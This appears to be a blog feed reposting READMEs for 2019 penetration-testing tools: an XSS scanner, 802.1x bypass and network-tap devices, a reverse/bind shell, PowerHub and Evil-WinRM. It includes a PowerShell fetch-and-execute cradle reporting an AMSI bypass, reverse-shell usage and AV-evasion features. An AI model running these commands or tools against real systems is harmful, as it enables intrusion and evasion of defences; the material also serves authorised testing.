This no-nonsense book helps you learn how to recognize the vulnerabilities in your systems so you can safeguard them more diligently—with confidence and ease.
  • Get up to speed on Windows 10 hacks  
  • Learn about the latest mobile computing hacks
  • Get free testing tools   
  • Find out about new system updates and improvements
  • There’s no such thing as being too safe — and this resourceful guide helps ensure you’re protected.



Free offer expires 10/15/19

Offered Free by: Wiley

Article link

Date of publish: Mon, 14 Oct 2019 14:22:00 +0000

TraXSS - Automated XSS Vulnerability Scanner


  • Automated Vulnerability Scanner for XSS 
  • Written in Python3 


Traxss is an automated framework to scan URLs and webpages for XSS Vulnerabilities. It includes over 575 Payloads to test with and multiple options for robustness of tests.

Getting Started

Prerequisites
Traxss depends on Chromedriver. On MacOS this can be installed with the homebrew command:

brew install cask chromedriver

Alternatively, find a version for other operating systems here: https://sites.google.com/a/chromium.org/chromedriver/downloads

Installation

Run the command:

pip3 install -r requirements.txt

Running Traxss
Traxx can be started with the command:

python3 traxss.py

This will launch an interactive CLI to guide you through the process.

Types of Scans

Full Scan with HTML

Uses a query scan with 575+ payloads and attempts to find XSS vulnerabilities by passing parameters through the URL. It will also render the HTML and attempt to find manual XSS Vulnerablities (this feature is still in beta).

Full Scan w/o HTML

This scan will run the query scan only.

Fast Scan w/o HTML

This scan is the same as the full w/ HTML but it will only use 7 attack vectors rather than the 575+ vectors.

Fast Scan w/o HTML

This scan is the same as the fast w/o HTML but it will only use 7 attack vectors rather than the 575+ vectors.

Contributing

Thank you for your interest! All types of contributions are welcome.
  • Fork and clone this repository
  • Create your branch from the master branch
  • Please open your PR with the master branch as the base

Download TraXSS

Article link

Date of publish: Mon, 14 Oct 2019 08:28:00 +0000

Penta- Open Source All-in-one CLI To Automate Pentesting


Penta (PENTest + Automation tool) is Pentest automation tool using Python3.

Installation

Install requirements
penta requires the following packages.
  • Python3.7
  • pipenv

Resolve python package dependency.

$ pipenv install

If you dislike pipenv..

$ pip install -r requirements.txt

Usage

$ pipenv run start <options>

If you dislike pipenv...

$ python penta/penta.py

Usage: List options

$ pipenv run start -h

usage: penta.py [-h] [-target TARGET] [-ports PORTS] [-proxy PROXY]

Penta is Pentest automation tool.

optional arguments:
  •   -h, --help      show this help message and exit
  •   -target TARGET  Specify target IP / domain
  •   -ports PORTS    Please, specify the target port(s) separated by comma.
  •                   Default: 21,22,25,80,110,443,8080
  •   -proxy PROXY    Proxy[IP:PORT]

Usage: Main menu

[ ] === MENU LIST =================================
[0] EXIT
[1] Port scanning Default: 21,22,25,80,110,443,8080
[2] Nmap & vuln scanning
[3] Check HTTP option methods
[4] Grab DNS server info
[5] Shodan host search
[6] FTP connect with anonymous
[7] SSH connect with Brute Force
[99] Change target host

1. Port scanning
To check ports for a target. Log output supported.

2. Nmap
To check ports by additional means using nmap

3. Check HTTP option methods
To check the methods (e.g. GET,POST) for a target.

4. Grab DNS server info
To show the info about DNS server.

Shodan host search To collect host service info from Shodan.
Request Shodan API key to enable the feature.

FTP connect with anonymous To check if it has anonymous access activated in port 21. FTP users can authenticate themselves using the plain text sign-in protocol (Typically username and password format), but they can connect anonymously if the server is configured to allow it.

Anyone can log in to the server if the administrator has allowed an FTP connection with an anonymous login.

SSH connect with Brute Force To check ssh connection to scan with Brute Force. Dictionary data is in data/dict.

Download Now

Article link

Date of publish: Thu, 10 Oct 2019 18:57:00 +0000

Dolos Cloak- For Network Penetration Testers To Automated 802.1x Bypass


Dolos Cloak- Automated 802.1x Bypass


Dolos Cloak is a python script designed to help network penetration testers and red teamers bypass 802.1x solutions by using an advanced man-in-the-middle attack.

The script is able to piggyback on the wired connection of a victim device that is already allowed on the target network without kicking the victim device off the network. It was designed to run on an Odroid C2 running Kali ARM and requires two external USB ethernet dongles. It should be possible to run the script on other hardware and distros but it has only been tested on an Odroid C2 thus far.

How it Works

Dolos Cloak uses iptables, arptables, and ebtables NAT rules in order to spoof the MAC and IP addresses of a trusted network device and blend in with regular network traffic. On boot, the script disallows any outbound network traffic from leaving the Odroid in order to hide the MAC addresses of its network interfaces.

Next, the script creates a bridge interface and adds the two external USB ethernet dongles to the bridge. All traffic, including any 802.1x authentication steps, is passed on the bridge between these two interfaces.

In this state, the device is acting like a wire tap. Once the Odroid is plugged in between a trusted device (desktop, IP phone, printer, etc.) and the network, the script listens to the packets on the bridge interface in order to determine the MAC address and IP of the victim device.

Once the script determines the MAC address and IP of the victim device, it configures NAT rules in order to make all traffic on the OUTPUT and POSTROUTING chains look like it is coming from the victim device. At this point, the device is able to communicate with the network without being burned.

Once the Odroid is spoofing the MAC address and IP of the victim device, the script sends out a DHCP request in order to determine its default gateway, search domain, and name servers. It uses the response in order to configure its network settings so that the device can communicate with the rest of the network.

At this point, the Odroid is acting as a stealthy foothold on the network. Operators can connect to the Odroid over the built-in NIC eth0 in order to obtain network access. The device can also be configured to send out a reverse shell so that operators can utilize the device as a drop box and run commands on the network remotely.

For example, the script can be configured to run an Empire python stager after running the man-in-the-middle attack. You can then use the Empire C2 connection to upgrade to a TCP reverse shell or VPN tunnel.

Installation and Usage

  • Perform default install of Kali ARM on Odroid C2. 
ssh root@169.254.44.44
  • Be sure to save this project to /root/tools/dolos_cloak
  • Plug one external USB NIC into the Odroid and run dhclient to get internet access in order to install dependencies:
dhclient usbnet0
  • Run the install script to get all the dependencies and set the Odroid to perform the MitM on boot by default. Keep in mind that this will make drastic changes to the device's network settings and disable Network Manager. You may want to download any additional tools before this step:
cd setup
./setup.sh
  • You may want to install some other tools like 'host' that do not come standard on Kali ARM. Empire, enum4linux, and responder are also nice additions.
  • Make sure you are able to ssh into the Odroid via the built-in NIC eth0. Add your public key to /root/.ssh/authorized_keys for fast access.
  • Modify config.yaml to meet your needs. You should make sure the interfaces match the default names that your Odroid is giving your USB dongles. Order does not matter here. You should leave client_ip, client_mac, gateway_ip, and gateway_mac blank unless you used a LAN tap to mine them. The script should be able to figure this out for us. Set these options only if you know for sure their values. The management_int, domain_name, and dns_server options are placeholders for now but will be usefull very soon. For shells, you can set up a custom autorun command in the config.yaml to run when the man-in-middle attack has autoconfigured. You can also set up a cron job to send back shells.
  • Connect two usb ethernet dongles and reboot the device (you need two because the built-in ethernet won't support promiscuous mode)
  • Boot the device and wait a few seconds for autosniff.py to block the OUTPUT ethernet and IP chains. Then plug in the Odroid between a trusted device and the network.
  • PWN N00BZ, get $$$, have fun, hack the planet

Tips

  • Mod and run ./scripts/upgrade_to_vpn.sh to turn a stealthy Empire agent into a full blown VPN tunnel
  • Mod and run ./scripts/reverse_listener_setup.sh to set up a port for a reverse listener on the device.
  • Run ./scripts/responder_setup.sh to allow control of the protocols that we capture for responder. You shoud run responder on the bridge interface:
responder -I mibr
  • Be careful as some NAC solutions use port 445, 443, and 80 to periodically verify hosts. Working on a solution to this.
  • Logs help when the autosniff.py misbehaves. The rc.local is set to store the current session logs in ./logs/session.log and logs in ./logs/history.log so we can reboot and still check the last session's log if need be. Log files have cool stuff in them like network info, error messages, and all bash commands to set up the NAT ninja magic.

Download Dolos Cloak

Article link

Date of publish: Mon, 23 Sep 2019 07:54:00 +0000

PostShell - Post Exploitation Bind/Backconnect Shell


PostShell - Post Exploitation Bind/Backconnect Shell


PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control.

The stub size is around 14kb and can be compiled on any Unix like system. Banner and interaction with shell after a connection is started.

Why not use a traditional Backconnect/Bind Shell?

PostShell allows for easier post-exploitation by making the attacker less dependant on dependencies such as Python and Perl.

It also incorporates both a back connect and bind shell, meaning that if a target doesn't allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely.

PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked.

Features

  • Anti-Debugging, if ptrace is detected as being attached to the shell it will exit.
  • Process Name/Thread names are cloaked, a fake name overwrites all of the system arguments and file name to make it seem like a legitimate program.
  • TTY, a TTY is created which essentially allows for the same usage of the machine as if you were connected via SSH.
  • Bind/Backconnect shell, both a bind shell and back connect can be created.
  • Small Stub Size, a very small stub(<14kb) is usually generated.
  • Automatically Daemonizes
  • Tries to set GUID/UID to 0 (root)

Getting Started

  1. Downloading: git clone https://github.com/rek7/postshell
  2. Compiling: cd postshell && sh compile.sh This should create a binary called "stub" this is the malware.

Commands

$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$

Example Usage

Backconnect:

$ ./stub 127.0.0.1 13377

Bind Shell:

$ ./stub 13377

Receiving a Connection with Netcat


Recieving a backconnect:

$ nc -vlp port

Connecting to a bind Shell:

$ nc host port

TODO:

Add domain resolution

Download PostShell

Disclaimer: These scripts for knowledge purpose only

Article link

Date of publish: Tue, 10 Sep 2019 06:31:00 +0000

Findomain- Fastest And Cross-platform Subdomain Enumerator

FinDomain- Fastest And Cross-platform Subdomain Enumerator.


Comparison
It comparison gives you a idea why you should use findomain instead of another enumerators. The domain used for the test was Microsoft.com in the following BlackArch virtual machine:

Host: KVM/QEMU (Standard PC (i440FX + PIIX, 1996) pc-i440fx-3.1)
Kernel: 5.2.6-arch1-1-ARCH
CPU: Intel (Skylake, IBRS) (4) @ 2.904GHz
Memory: 139MiB / 3943MiB

Find-Domain used to calculate the time, is the time command in Linux.

You can see all the details of the tests in it link.


Enumeration ToolSearch TimeTotal Subdomains FoundCPU UsageRAM Usage
Findomainreal 0m38.701s5622Very LowVery Low
assetfinderreal 6m1.117s4630Very LowVery Low
Subl1st3rreal 7m14.996s996LowLow
Amass*real 29m20.301s332Very HighVery High

I can't wait to the amass test for finish, looks like it will never ends and additionally the resources usage is very high.

Note: The benchmark was made the 10/08/2019, since it point other software's can improve things and you will got different results.

Features

  • Discover sub-domains without brute-force, it uses Certificate Transparency Logs.
  • Discover sub-domains with or without IP address according to user arguments.
  • Read target from user argument (-t).
  • Read a list of targets from file and discover their sub-domains with or without IP and also write to output files per-domain if specified by the user, recursively.
  • Write output to TXT file.
  • Write output to CSV file.
  • Write output to JSON file.
  • Cross platform support: Any platform.
  • Optional multiple API support.
  • Proxy support.

Note: the proxy support is just to proxify APIs requests, the actual implementation to discover IP address of sub-domains doesn't support proxyfing and it's made using the host network still if you use the -p option.

How it works?

It tool doesn't use the common methods for sub(domains) discover, the tool uses Certificate Transparency logs to find sub-domains and it method make it tool the most faster and reliable. The tool make use of multiple public available APIs to perform the search. If you want to know more about Certificate Transparency logs, read https://www.certificate-transparency.org/

APIs that are using at the moment:
  • Certspotter: https://api.certspotter.com/
  • Crt.sh : https://crt.sh
  • Virustotal: https://www.virustotal.com/ui/domains/
  • Sublit3r: https://api.sublist3r.com/
  • Facebook: https://developers.facebook.com/docs/certificate-transparency

If you know other that should be added, open an issue.

Supported platforms in our binary releases

All supported platforms in the binarys that we give are 64 bits only and we don't have plans to add support for 32 bits binary releases, if you want to have support for 32 bits follow the documentation.
  • Linux
  • Windows
  • MacOS
  • ARM
  • Arch64 (Raspberry Pi)

Build for 32 bits or another platform

If you want to build the tool for your 32 bits system or another platform, follow it steps:

Note: You need to have rust, make and perl installed in your system first.

Using the Github source code:
  • Clone the repository or download the release source code.
  • Extract the release source code (only needed if you downloaded the compressed file).
  • Go to the folder where the source code is.
  • Execute cargo build --release
  • Now your binary is in target/release/findomain and you can use it.

Installation Android (Termux)

Install the Termux package, open it and follow it commands:

$ pkg install rust make perl
$ cargo install findomain
$ cd $HOME/.cargo/bin
$ ./findomain

Installation in Linux using source code

If you want to install it, you can do that manually compiling the source or using the precompiled binary.

Manually: You need to have rust, make and perl installed in your system first.

$ git clone https://github.com/Edu4rdSHL/findomain.git
$ cd findomain
$ cargo build --release
$ sudo cp target/release/findomain /usr/bin/
$ findomain

Installation in Linux using compiled artifacts

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
$ chmod +x findomain-linux
$ ./findomain-linux

If you are using the BlackArch Linux distribution, you just need to use:

$ sudo pacman -S findomain


Installation ARM

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-arm
$ chmod +x findomain-arm
$ ./findomain-arm

Installation Aarch64 (Raspberry Pi)

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64
$ chmod +x findomain-aarch64
$ ./findomain-aarch64

Installation Windows

Download the binary from 
https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe

Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.

Exec: findomain-windows in the CMD shell.

Installation MacOS

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx
$ chmod +x findomain-osx.dms
$ ./findomain-osx.dms

Usage

You can use the tool in two ways, only discovering the domain name or discovering the domain + the IP address.

findomain 0.2.0
Eduard Tolosa <tolosaeduard@gmail.com>
A tool that use Certificates Transparency logs to find subdomains.

USAGE:
    findomain [FLAGS] [OPTIONS]

FLAGS:
    -a, --all-apis    Use all the available APIs to perform the search. It take more time but you will have a lot of
                      more results.
    -h, --help        Prints help information
    -i, --get-ip      Return the subdomain list with IP address if resolved.
    -V, --version     Prints version information

OPTIONS:
    -f, --file <file>        Sets the input file to use.
    -o, --output <output>    Write data to output file in the specified format. [possible values: txt, csv, json]
    -p, --proxy <proxy>      Use a proxy to make the requests to the APIs.
    -t, --target <target>    Target host


Examples

Make a simple search of subdomains and print the info in the screen:
findomain -t example.com

Make a simple search of subdomains using all the APIs and print the info in the screen:
findomain -t example.com -a

Make a search of subdomains and export the data to a CSV file:
findomain -t example.com -o csv

Make a search of subdomains using all the APIs and export the data to a CSV file:
findomain -t example.com -a -o csv

Make a search of subdomains and resolve the IP address of subdomains (if possible):
findomain -t example.com -i

Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible):
findomain -t example.com -i -a

Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible), exporting the data to a CSV file:
findomain -t example.com -i -a -o csv

Make a search of subdomains using a proxy (http://127.0.0.1:8080 in it case, the rest of aguments continue working in the same way, you just need to add the -p flag to the before commands):
findomain -t example.com -p http://127.0.0.1:8080

Download FinDomain

Article link

Date of publish: Sat, 24 Aug 2019 08:56:00 +0000

Burp Suite Extension - To Monitor And Keep Track of Tested Endpoints


Burp Scope Monitor Extension

A Burp Suite Extension to monitor and keep track of tested endpoints.


Main Features


  • Simple, easy way to keep track of unique endpoints when testing an application
  • Mark individual endpoints as analyzed or not
  • Instantly understand when a new endpoint, not tested is requested
  • Accessible from Proxy tab (right click, mark request as analyzed/not)
  • Send to Repeater
  • Enforcement of Burp's in scope rules
  • Import/Export state file directly to a CSV file for
  • Autosave option


Installation


  1. Make sure you have Jython configured under Extender -> Options -> Python Environment. For further instructions, check PortSwigger official instructions at their support page.
  2. git clone git@github.com:Regala/burp-scope-monitor.git
  3. Import main.py in Extender - Extender -> Extensions -> Add -> Select Python -> Select main.py


Documentation

Most of the options available in General or Import tabs are auto-explanatory.


  • "Repeater request automatically marks as analyzed" - when issuing a request to an endpoint from repeater, it marks this request as analyzed automatically.
  • "Color request in Proxy tab" - this essentially applies the behavior of the extension in the Proxy tab, if you combine these options with "Show only highlighted items" in Proxy. However, it's not as pleasant to the eyes as the color pallete is limited.
  • "Autosave periodically" - backups the state file every 10 minutes. When activating this option, consider disabling "Autostart Scope Monitor". This is in order to maintain a different state file per Burp project. However, you can easily maintain only one, master state file.
  • "Import/Export" is dedicated to handle the saved state files. It's preferred to open your Burp project file associated with the Scope Monitor. It will still work if the Burp project is different, but when loading the saved entries, you won't be able to send them to Repeater or view the request itself in the Request/Response viewer (this is due to the fact that we are not storing the actually requests - just the endpoint, it's analyzed status and a couple of other more. This makes it a little bit more efficient).

Future Development


  • Keep track of parameters observed in all requests
  • Highlight when a new parameter was used in an already observed/analyzed endpoint
  • Export to spreadsheet / Google Sheets
  • Adding notes to the endpoint

Implementation

The code is not yet performant, optimized or anything similar. KISS and it works. Performance will be increased depending on demand and how the extension performs when handling large Burp projects.

To circumvent some of Burp's Extender API limitations, some small hacks were implemented. One of those is automatically setting a comment on the requests that flow in the Proxy tab.

You can still add comments on the items, as you'd normally would, but just make sure to keep the placeholder string (scope-monitor-placeholder) there.

Hopefully in the future each requestResponse from Burp will have a unique identifier, which would make the import state / load from file much cleaner and fast. With large state files, this might hang a bit when loading.

Download Burp Scope Monitor 

Article link

Date of publish: Wed, 21 Aug 2019 11:45:00 +0000

Slurp- To Security Audits of S3 Buckets Enumerator


Slurp- Blackbox/Whitebox S3 Bucket Enumerator

To Evaluate the security of S3 buckets


Overview

  • Credit to all the vendor packages to develop Slurp possible.
  • Slurp is for pen-testers and security professionals to perform audits of s3 buckets.

Features

  • Scan via domain(s); you can target a single domain or a list of domains
  • Scan via keyword(s); you can target a single keyword or a list of keywords
  • Scan via AWS credentials; you can target your own AWS account to see which buckets have been exposed
  • Colorized output for visual grep
  • Currently generates over 28,000 permutations per domain and keyword (thanks to @jakewarren and @random-robbie)
  • Punycode support for internationalized domains
  • Strong copyleft license (GPLv3)

Modes

There are two modes that this tool operates at; blackbox and whitebox mode. Whitebox mode (or internal) is significantly faster than blackbox (external) mode.

Blackbox (external)

In this mode, you are using the permutations list to conduct scans. It will return false positives and there is no way to link the buckets to an actual aws account! Do not open issues asking how to do this.

Domain


Keywords


Whitebox (internal)

In this mode, you are using the AWS API with credentials on a specific account that you own to see what is open. This method pulls all S3 buckets and checks Policy/ACL permissions. Note that, I will not provide support on how to use the AWS API.

Your credentials should be in ~/.aws/credentials.

Internal



Usage

  • slurp domain <-t|--target> example.com will enumerate the S3 domains for a specific target.
  • slurp keyword <-t|--target> linux,golang,python will enumerate S3 buckets based on those 3 key words.
  • slurp internal performs an internal scan using the AWS API.

Installation

This project uses vgo; you can clone and go build or download from Releases section.

Please do not open issues on why you cannot build the project; this project builds like any other project would in Go, if you cannot build then I strongly suggest you read the go spec.

Also, the only binaries I'm including are linux/amd64; if you want mac/windows binaries, build it yourself.

Download Slurp

Article link

Date of publish: Wed, 07 Aug 2019 21:47:00 +0000

PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection

PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection


PowerHub is a convenient post exploitation tool which aids a pentester in transferring files, in particular code which may get flagged by endpoint protection.


During an engagement where you have a test client available, one of the first things you want to do is run PowerSploit. So you need to download the files, messing with endpoint protection, disable the execution policy, etc.

PowerHub provides an (almost) one-click-solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.

On top of that, PowerHub comes with a reverse PowerShell, making it suitable for any kind of post-exploitation action.

Here is a simple example (grab information about local groups with PowerView and transfer it back):

PS C:\Users\avollmer> $K=new-object net.webclient;IEX $K.downloadstring('http://192.168.11.2:8000/0');
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
                            written by Adrian Vollmer, 2018-2019
Run 'Help-PowerHub' for help
AmsiScanBuffer patch has been applied.
0
PS C:\Users\avollmer> lhm powerview
[*] /ps1/PowerSploit/Recon/PowerView.ps1 imported.
PS C:\Users\avollmer> Get-LocalGroup | pth -Name groups.json


Installation

PowerHub itself does not need to be installed. Just execute powerhub.py. However, there are a few dependencies. They are listed in the requirements.txt. Install them either via pip3 install --user -r requirements.txt or use a virtual environment:

Run python3 -m venv env to create a virtual environment, then use source env/bin/activate to activate it. Now run pip3 install -r requirements.txt to install the depencendies inside the virtual environment.

Python2 is not supported.

Usage

PowerHub has one mandatory argument: the callback host (can be an IP address). You should also use --auth <user>:<pass>, otherwise, a randomly generated password will be used for basic authentication.

The switch --no-auth disables basic authentication which is not recommended. The callback host name is used by the stager to download the payload. If the callback port or path differ from the default, it can also be changed.

Read ./powerhub.py --help and the Wiki for details.

Download PowerHub

Article link

Date of publish: Wed, 07 Aug 2019 21:15:00 +0000

Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap


Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap Aimed at Red Teams.



With limited physical access to a target building, this tap can be installed inline between a network device and the corporate network.


PhanTap is silent in the network and does not affect the victim’s traffic, even in networks having NAC (Network Access Control 802.1X - 2004). PhanTap will analyze traffic on the network and mask its traffic as the victim device.

It can mount a tunnel back to a remote server, giving the user a foothold in the network for further analysis and pivoting. PhanTap is an OpenWrt package and should be compatible with any device. The physical device used for our testing is currently a small, inexpensive router, the GL.iNet GL-AR150.

Features:

  • Transparent network bridge.
  • Silent : No ARP, multicast, broadcast.
  • 802.1x passthrough.
  • Automatic configuration:
Capture traffic exiting the network (the destination is non RFC1918), source IP and MAC is our victim, destination MAC is our gateway,
SNAT bridge traffic to the victim MAC and IP address,
set the router default gateway to the MAC of the gateway detected just before.

  • Introspects ARP, multicast and broadcast traffic and adds a route to the machine IP address and adds the machine MAC address to the neighbor list, hence giving the possibility of talking to all the machines in the local network.
  • Learns the DNS server from traffic and modifies the one on the router so that it's the same.
  • Can run commands (ex: /etc/init.d/openvpn restart) when a new IP or DNS is configured.
  • Lets you choose any VPN software, for example OpenVPN tcp port 443 so it goes through most firewalls.
  • You can talk to the victim machine (using the gateway IP).

Setup

PhanTap has been tested with the GL.iNet GL-AR150. This device has two separate network interfaces in OpenWrt (eth0, eth1).

If your device is using an internal switch (swconfig based) with interfaces like eth0.1, eth0.2, some special traffic might be blocked, e.g. 802.1Q (tagged vlan), but PhanTap should work.
  • Install a snapshot build, for the GL.iNet GL-AR150
  • Update the OpenWrt package list
opkg update
  • Install PhanTap package:
opkg install phantap phantap-learn
  • Configure the Wifi and start administering the router through it.
  • Either reboot the device, or run /etc/init.d/phantap setup.
  • Get the interface names from that device:
# uci show network | grep ifname
network.loopback.ifname='lo'
network.lan.ifname='eth1'
network.wan.ifname='eth0'
network.wan6.ifname='eth0'

In this example we are using a GL-AR150, which only has 2 interfaces.

Add the interfaces to the phantap bridge via the following commands in the cli (assuming we are using a GL-AR150):
  • uci delete network.lan.ifname
  • uci delete network.wan.ifname
  • uci delete network.wan6.ifname
  • uci set network.phantap.ifname='eth0 eth1'
  • uci commit network
  • /etc/init.d/network reload

Phantap is now configured, as soon as you plug it between a victim and their switch, it will automatically configure the router and give it Internet access.

You can add your favorite VPN to have a remote connection back. Tested PhanTap with Vpn, port TCP 443, to avoid some detection methods.

You can also add a command to be ran when a new IP or DNS is configured, in /etc/config/phantap, e.g. /etc/init.d/openvpn restart (restart VPN service).

You can also look at disabling the wifi by default and using hardware buttons to start it (https://openwrt.org/docs/guide-user/hardware/hardware.button).

Limitations or how it can be detected :

  • The GL.iNet GL-AR150 and most inexpensive devices only support 100Mbps, meanwhile modern network traffic will be 1Gbps.
  • The network port will stay up, switch side, when the victim device is disconnected/shutdown.
  • There is no re-configuration of PhanTap, so we might use an IP that has been reattributed to another device (roadmap DHCP).
  • Some traffic is blocked by the Linux bridge (STP/Pause frames/LACP).

Roadmap :

  • Add logic to restart the detection when the links go up/down.
  • Add DHCP packet analysis for dynamic reconfiguration.
  • Add IPv6 support.
  • Test limitations of devices that have switches(swconfig) instead of separate interfaces.

Article link

Date of publish: Wed, 07 Aug 2019 20:47:00 +0000

CloudCheck- To Test String If A Cloudflare DNS Bypass is Possible


CloudCheck- To Test String If A Cloudflare DNS Bypass is Possible 


Cloudcheck is made to be used in the same folder as CloudFail. Make sure all files in this repo are in the same folder before using.

CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by Cloudflare in the hopes of discovering the location of the server.

Using Tor to mask all requests, the tool as of right now has 3 different attack phases.
  • Misconfigured DNS scan using DNSDumpster.com.
  • Scan the Crimeflare.com database.
  • Bruteforce scan over 2500 subdomains.

Cloudcheck create a empty text file called none.txt in the data folder, that way it doesn't do a subdomain brute when testing.

Cloudcheck will automatically change your hosts file, using entries from CloudFail and test for a specified string to detect if said entry can be used to bypass Cloudflare.

If output comes out to be "True", you can use the IP address to bypass Cloudflare in your hosts file. (Later automating this process)

Download Cloudcheck

Article link

Date of publish: Fri, 02 Aug 2019 17:03:00 +0000

The Ultimate WinRM Shell For Penetration Testing


This shell is the ultimate WinRM shell for hacking/pentesting.


WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. 


A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system adminsitrators.

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase.

The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.

Features

  • Command History
  • WinRM command completion
  • Local files completion
  • Upload and download files
  • List remote machine services
  • FullLanguage Powershell language mode
  • Load Powershell scripts
  • Load in memory dll files bypassing some AVs
  • Load in memory C# (C Sharp) compiled exe files bypassing some AVs
  • Colorization on output messages (can be disabled optionally)

Help

Usage: 
evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL]

  • -i, --ip IP                Remote host IP or hostname (required)
  • -P, --port PORT                Remote host port (default 5985)
  • -u, --user USER                 Username (required)
  • -p, --password PASS       Password
  • -s, --scripts PS_SCRIPTS_PATH    Powershell scripts path (required)
  • -e, --executables EXES_PATH        C# executables path (required)
  • -U, --url URL                    Remote url endpoint (default /wsman)
  • -V, --version                    Show version
  • -h, --help                           Display this help message


Requirements

Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1.

~$ sudo gem install winrm winrm-fs colorize stringio

Installation 

Step 1. Clone the repo: 

git clone https://github.com/Hackplayers/evil-winrm.git

Step 2. Ready. Just launch it!

 ~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

If you don't want to put the password in clear text, you can optionally avoid to set -p argument and the password will be prompted preventing to be shown.

To use IPv6, the address must be added to /etc/hosts.

Alternative installation method as ruby gem

Step 1. Install it: 

gem install evil-winrm

Step 2. Ready. Just launch it!

~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'


Documentation

Basic commands

  • upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.
  • usage: upload local_path remote_path
  • download: it is not needed to set local_path if the remote file is in the current directory.
  • usage: download remote_path local_path
  • services: list all services. No administrator permissions needed.
  • menu: load the Invoke-Binary and l04d3r-LoadDll functions that we will explain below. When a ps1 is loaded all its functions will be shown up.

Load powershell scripts

To load a ps1 file you just have to type the name (auto-completion usnig tab allowed). The scripts must be in the path set at -s argument. Type menu again and see the loaded functions.


Advanced commands

Invoke-Binary: allows exes compiled from c# to be executed in memory. The name can be auto-completed using tab key and allows up to 3 parameters. The executables must be in the path set at -e argument.



l04d3r-LoadDll: allows loading dll libraries in memory, it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))

The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions.




Extra features

To disable colors just modify on code this variable $colors_enabled. Set it to false: $colors_enabled = false


Disclaimer 

Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.

Download Winrm

Article link

Date of publish: Wed, 31 Jul 2019 12:21:00 +0000

USBRIP- Simple Command Live Forensic Tool For Tracking USB device

USBRIP- Simple Command Live Forensic Tool For Tracking USB device

Simple command line forensics tool for tracking USB device artifacts (history of USB events) on GNU/Linux.


usbrip (derived from "USB Ripper", not "USB R.I.P." astonished) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.

usbrip is a small piece of software written in pure Python 3 (using some external modules though, see Dependencies/PIP) which parses Linux log files (/var/log/syslog* or /var/log/messages* depending on the distro) for constructing USB event history tables. Such tables may contain the following columns: "Connected" (date & time), "User", "VID" (vendor ID), "PID" (product ID), "Product", "Manufacturer", "Serial Number", "Port" and "Disconnected" (date & time).

Besides, it also can:
  • export gathered information as a JSON dump (and open such dumps, of course);
  • generate a list of authorized (trusted) USB devices as a JSON (call it auth.json);
  • search for "violation events" based on the auth.json: show (or generate another JSON with) USB devices that do appear in history and do NOT appear in the auth.json;
  • When installed with -s flag create crypted storages (7zip archives) to automatically backup and accumulate USB events with the help of crontab scheduler;
  • search additional details about a specific USB device based on its VID and/or PID.

Quick Start

usbrip is available for download and installation at PyPI:

$ pip3 install usbrip



Git Clone

For simplicity, lets agree that all the commands where ~/usbrip$ prefix is appeared are executed in the ~/usbrip directory which is created as a result of git clone:

~$ git clone https://github.com/snovvcrash/usbrip.git usbrip && cd usbrip
~/usbrip$

Dependencies

usbrip works with non-modified structure of system log files only, so, unfortunately, it won't be able to parse USB history if you change the format of syslogs (with syslog-ng or rsyslog, for example). That's why the timestamps of "Connected" and "Disconnected" fields don't have the year, by the way. Keep that in mind.

DEB Packages

  • python3.6 (or newer) interpreter
  • python3-venv
  • p7zip-full (used by storages module)
  • ~$ sudo apt install -y python3-venv p7zip-full

PIP Packages

usbrip makes use of the following external modules:
  • terminaltables
  • termcolor

To resolve Python dependencies manually (it's not necessary actually because pip or setup.py can automate the process, see Installation) create a virtual environment (optional) and run pip from within:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ pip install -r requirements.txt

